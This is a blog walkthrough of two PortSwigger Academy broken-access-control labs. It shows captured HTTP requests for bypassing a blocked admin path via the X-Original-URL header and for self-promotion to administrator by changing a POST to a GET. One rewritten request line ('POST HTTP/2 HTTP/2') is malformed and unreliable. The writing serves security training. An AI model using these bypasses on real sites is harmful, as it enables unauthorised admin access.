316 words
2 minutes
PortSwigger Academy - More Broken Access Control Labs.
28/07/2025
Cybersecurity
/
BURP
/
portswigger
/
Walkthrough

Lab: URL-based access control can be circumvented#

This website has an unauthenticated admin panel at /admin, but a front-end system has been configured to block external access to that path. However, the back-end application is built on a framework that supports the X-Original-URL header.
To solve the lab, access the admin panel and delete the user carlos.
Link to lab: https://portswigger.net/web-security/access-control/lab-url-based-access-control-can-be-circumvented

When trying to access the Admin panel via the front end system, we get “access denied”. When intercepting the request it looks like:

GET /admin HTTP/1.1
Host: 0a4100100341d6af81f4bb30009d00ae.web-security-academy.net
Cookie: session=57EynBodRDJEQ7CmkwnYzAR2kh24whYR
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a4100100341d6af81f4bb30009d00ae.web-security-academy.net/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive

What we did was replace

GET /admin HTTP/1.1

for

POST HTTP/2 HTTP/2
X-Original-Url: /admin/

And this led us to the admin panel in the response. From there we can use the information to delete the carlos username (/admin/delete?username=carlos)

Lab: Method-based access control can be circumvented#

This lab implements access controls based partly on the HTTP method of requests. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.
To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.
Link to lab: https://portswigger.net/web-security/access-control/lab-method-based-access-control-can-be-circumvented

Using the admin credentials we see that the role upgrade request looks like this:

POST /admin-roles HTTP/2
Host: 0a3500760486f48e80ed35c4002d0086.web-security-academy.net
Cookie: session=jzjXTYjlxHZIyKGW4a1IEsYfwHruxGZU
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Origin: https://0a3500760486f48e80ed35c4002d0086.web-security-academy.net
Referer: https://0a3500760486f48e80ed35c4002d0086.web-security-academy.net/admin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

username=carlos&action=upgrade

Trying to use the same request from wiener’s user is not feasible, you get “Unauthorized”. Instead I replaced the POST method for GET changing

POST /admin-roles HTTP/2

for

GET /admin-roles?username=wiener&action=upgrade HTTP/2

(Easier way of doing it I didn’t know: right-clicking and selecting “Change request method”.)

Skills Assessment - Information Gathering - HackTheBox.
PortSwigger Academy - Path traversal.